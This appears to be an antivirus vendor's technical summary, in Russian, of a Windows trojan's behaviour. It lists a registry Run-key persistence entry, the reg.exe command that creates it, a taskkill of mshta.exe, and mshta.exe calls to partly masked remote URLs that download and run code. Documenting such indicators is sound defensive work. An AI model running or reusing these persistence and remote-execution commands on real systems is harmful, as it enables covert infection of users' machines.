Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Explorer7' = '<Полный путь к вирусу>'
- <SYSTEM32>\taskkill.exe /f /im mshta.exe /t
- <SYSTEM32>\mshta.exe http://www.aa##ea.com/%USERNAME%/templates/joomla_admin/images/img/news.aspx
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f /v Explorer7 /t REG_SZ /d "<Полный путь к вирусу>"
- <SYSTEM32>\mshta.exe http://co####uide.co.il/Backoffice/BackOffice_Modules/New.aspx
- <Полный путь к вирусу>
- 'localhost':1035
- DNS ASK co####uide.co.il
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''